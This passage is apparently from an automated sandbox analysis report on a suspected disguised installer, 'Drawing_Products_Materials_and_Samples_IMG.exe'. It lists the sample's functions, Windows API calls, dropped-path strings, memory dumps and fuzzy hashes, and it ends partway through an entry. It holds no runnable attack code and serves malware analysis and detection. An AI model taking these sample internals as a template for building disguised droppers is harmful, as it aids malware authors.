                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointer
                                                                                      • String ID:
                                                                                      • API String ID: 973152223-0
                                                                                      • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                      • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                                      • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                      • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                                                      Function 00403EAE Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00403C8B), ref: 00403EB8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallbackDispatcherUser
                                                                                      • String ID:
                                                                                      • API String ID: 2492992576-0
                                                                                      • Opcode ID: 98b266ebdf0f3c27f3687bff4252ab036e6b5e8ad03fafb5568fabfe7cf076f6
                                                                                      • Instruction ID: 4f3b606e1f3b2692e0293683fec327d542fd6d14cd426307677a9e2f6e263f5f
                                                                                      • Opcode Fuzzy Hash: 98b266ebdf0f3c27f3687bff4252ab036e6b5e8ad03fafb5568fabfe7cf076f6
                                                                                      • Instruction Fuzzy Hash: F2A01231404001EBCB018B10DF05C057F21B7503007018421E1404003486310420FF1A
                                                                                      Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(00000000), ref: 004014E5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID:
                                                                                      • API String ID: 3472027048-0
                                                                                      • Opcode ID: 483807046c5787cf829f1f025dfbf0267f550373e9d3267be06ec47a5de8a1ec
                                                                                      • Instruction ID: 7c20b9ee9fc925407df665bd309881a2e76883233c2924fbfc7b34ac39994685
                                                                                      • Opcode Fuzzy Hash: 483807046c5787cf829f1f025dfbf0267f550373e9d3267be06ec47a5de8a1ec
                                                                                      • Instruction Fuzzy Hash: 33D0C977B141048BD750E7B8AE8995A73A8FB4132A3244833E502E11A2D579C952961D
                                                                                      Function 00405654 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CharNextA.USER32(?,0040319C,"C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe",00000020), ref: 00405661
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext
                                                                                      • String ID:
                                                                                      • API String ID: 3213498283-0
                                                                                      • Opcode ID: cab86ad4fbbc926bf9d9c4068ad28f349fd9e0cffecbcadba0a0645dfc6f61bb
                                                                                      • Instruction ID: 0ca2c1d1cd56b8494dfdae5d12dc8eb654283e636b180148ddf181c942f9ef5a
                                                                                      • Opcode Fuzzy Hash: cab86ad4fbbc926bf9d9c4068ad28f349fd9e0cffecbcadba0a0645dfc6f61bb
                                                                                      • Instruction Fuzzy Hash: 3FC08C3450C78467C62067309128C677FF0EA62301FAC8CAAF0C863250C23AA8008F2A

                                                                                      Non-executed Functions

                                                                                      Function 004042CA Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 268stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404319
                                                                                      • SetWindowTextA.USER32(00000000,?), ref: 00404343
                                                                                      • SHBrowseForFolderA.SHELL32(?,0079E0D0,?), ref: 004043F4
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 004043FF
                                                                                      • lstrcmpiA.KERNEL32(Call,Unnarcotic33 Setup: Installing), ref: 00404431
                                                                                      • lstrcatA.KERNEL32(?,Call), ref: 0040443D
                                                                                      • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040444F
                                                                                        • Part of subcall function 00405391: GetDlgItemTextA.USER32(?,?,00000400,00404486), ref: 004053A4
                                                                                        • Part of subcall function 00405DE7: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,773E3410,004032A1), ref: 00405E3F
                                                                                        • Part of subcall function 00405DE7: CharNextA.USER32(?,?,?,00000000), ref: 00405E4C
                                                                                        • Part of subcall function 00405DE7: CharNextA.USER32(?,"C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,773E3410,004032A1), ref: 00405E51
                                                                                        • Part of subcall function 00405DE7: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,773E3410,004032A1), ref: 00405E61
                                                                                      • GetDiskFreeSpaceA.KERNEL32(0079DCC8,?,?,0000040F,?,0079DCC8,0079DCC8,?,00000000,0079DCC8,?,?,000003FB,?), ref: 0040450A
                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404525
                                                                                      • SetDlgItemTextA.USER32(00000000,00000400,0079DCB8), ref: 004045AB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                      • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid$Call$Unnarcotic33 Setup: Installing
                                                                                      • API String ID: 2246997448-3913767421
                                                                                      • Opcode ID: d11473757895cbeea30969d5c3e3b32dd3eed759e8bcc0977622a3c2a735b34f
                                                                                      • Instruction ID: 4ae84918bfcb19ccc062e7c66334806cf97196d40f906e8bfa3db2fe6562258c
                                                                                      • Opcode Fuzzy Hash: d11473757895cbeea30969d5c3e3b32dd3eed759e8bcc0977622a3c2a735b34f
                                                                                      • Instruction Fuzzy Hash: E79182B1900209ABDB10AFA5CC81BAF77B8EF85314F14447BFB15B62D1C77C9A418B69
                                                                                      Function 0040264F Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040265E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindFirst
                                                                                      • String ID:
                                                                                      • API String ID: 1974802433-0
                                                                                      • Opcode ID: 1ac19ad84c37da439677c9f8c78e0b3ae6552ebd45b2a652de7fa53404bddbf0
                                                                                      • Instruction ID: ad23281ba59b28ec3aa51a9822d84a42962ca700f092f657026e1e1555a452f0
                                                                                      • Opcode Fuzzy Hash: 1ac19ad84c37da439677c9f8c78e0b3ae6552ebd45b2a652de7fa53404bddbf0
                                                                                      • Instruction Fuzzy Hash: D4F0A0326041149AD700E7B4A949AEEB778CB15324F20467FE101E20C2C6B86A859A2E
                                                                                      Function 004058A2 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 141filestringmemoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrcpyA.KERNEL32(007A0A88,NUL,?,00000000,?,00000000,?,00405A58,?,?,00000001,00405618,?,00000000,000000F1,?), ref: 004058B2
                                                                                      • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405A58,?,?,00000001,00405618,?,00000000,000000F1,?), ref: 004058D6
                                                                                      • GetShortPathNameA.KERNEL32(00000000,007A0A88,00000400), ref: 004058DF
                                                                                        • Part of subcall function 0040578F: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,004059A1,00000000,[Rename]), ref: 0040579F
                                                                                        • Part of subcall function 0040578F: lstrlenA.KERNEL32(?,?,00000000,004059A1,00000000,[Rename]), ref: 004057D1
                                                                                      • GetShortPathNameA.KERNEL32(?,007A0E88,00000400), ref: 004058FC
                                                                                      • wsprintfA.USER32 ref: 0040591A
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,007A0E88,C0000000,?,007A0E88,?,?,?,?,?), ref: 00405955
                                                                                      • GlobalAlloc.KERNEL32(?,0000000A), ref: 00405964
                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040597E
                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 004059AE
                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,007A0688,00000000,-0000000A,0040936C,00000000,[Rename]), ref: 00405A04
                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00405A16
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00405A1D
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405A24
                                                                                        • Part of subcall function 0040582A: GetFileAttributesA.KERNELBASE(00000003,00402C73,C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe,80000000,00000003), ref: 0040582E
                                                                                        • Part of subcall function 0040582A: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405850
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                      • String ID: %s=%s$NUL$[Rename]
                                                                                      • API String ID: 3756836283-4148678300
                                                                                      • Opcode ID: 9cbe9b5ad7652f71b3bf46850bdacea2b472ed22328456280b8c5d075f8c3f66
                                                                                      • Instruction ID: b634479a22e8deba9b5d3b544f15de7451186434928a8d52e653b83d4df64d8e
                                                                                      • Opcode Fuzzy Hash: 9cbe9b5ad7652f71b3bf46850bdacea2b472ed22328456280b8c5d075f8c3f66
                                                                                      • Instruction Fuzzy Hash: 1B411671704B05AFD2206B249C89F6B7A5CEF85715F14053AFE02F62D2E67CA8018EBD
                                                                                      Function 1000236D Relevance: 15.1, APIs: 10, Instructions: 132memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • wsprintfA.USER32 ref: 100023D2
                                                                                      • GlobalAlloc.KERNEL32(?,?,?,?,?,00000000,00000001,100017D5,00000000), ref: 100023EA
                                                                                      • StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,100017D5,00000000), ref: 100023FB
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000000,00000001,100017D5,00000000), ref: 10002410
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10002417
                                                                                        • Part of subcall function 100012E8: lstrcpyA.KERNEL32(-1000404B,00000000,?,10001199,?,00000000), ref: 10001310
                                                                                      • GlobalFree.KERNEL32(?), ref: 1000248E
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100024B7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17896186253.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17896153967.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17896219730.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17896248787.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$AllocByteCharFromMultiStringWidelstrcpywsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 2278267121-0
                                                                                      • Opcode ID: 3ee0894ed4fe1b0af880131e50e06ec5e86c9efe6cc015858b811f9b411bf8ba
                                                                                      • Instruction ID: 2b73d6ec50a8d2f500b210c633f34be0aa2160400c3477ecc395e3c682f4b703
                                                                                      • Opcode Fuzzy Hash: 3ee0894ed4fe1b0af880131e50e06ec5e86c9efe6cc015858b811f9b411bf8ba
                                                                                      • Instruction Fuzzy Hash: DE41ADB1109216EFF715DFA4CC88E2BBBECFB042D57124619FA51921A9DB35AC409B31
                                                                                      Function 0040400A Relevance: 13.6, APIs: 9, Instructions: 86windowstringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404060
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404074
                                                                                      • SendMessageA.USER32(?,0000045B,00000001,00000000), ref: 00404092
                                                                                      • GetSysColor.USER32(?), ref: 004040A3
                                                                                      • SendMessageA.USER32(?,00000443,00000000,?), ref: 004040B2
                                                                                      • SendMessageA.USER32(?,00000445,00000000,04010000), ref: 004040C1
                                                                                      • lstrlenA.KERNEL32(?,?,00000445,00000000,04010000,?,00000443,00000000,?,?,0000045B,00000001,00000000), ref: 004040C4
                                                                                      • SendMessageA.USER32(?,00000435,00000000,00000000), ref: 004040D3
                                                                                      • SendMessageA.USER32(?,00000449,?,?), ref: 004040E8
                                                                                        • Part of subcall function 00403E8C: SetDlgItemTextA.USER32(?,?,00000000), ref: 00403EA6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Item$ButtonCheckColorTextlstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 975578812-0
                                                                                      • Opcode ID: 4a373e71f557a819994200e52e65e0901f72cf92ddef205a664c8259f9d36b6f
                                                                                      • Instruction ID: 4bc2b926a6c7cd0b1bd4f0ec5791e08d620b514608e1a02b87d87c64bc9e1770
                                                                                      • Opcode Fuzzy Hash: 4a373e71f557a819994200e52e65e0901f72cf92ddef205a664c8259f9d36b6f
                                                                                      • Instruction Fuzzy Hash: DC21A4B2E402147EEB116F71DD45F6A3EACEB40741F004466FB05FA1D2C6B89A018AA9
                                                                                      Function 00405DE7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,773E3410,004032A1), ref: 00405E3F
                                                                                      • CharNextA.USER32(?,?,?,00000000), ref: 00405E4C
                                                                                      • CharNextA.USER32(?,"C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,773E3410,004032A1), ref: 00405E51
                                                                                      • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,773E3410,004032A1), ref: 00405E61
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DE8, 00405DED
                                                                                      • *?|<>/":, xrefs: 00405E2F
                                                                                      • "C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe", xrefs: 00405E23
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
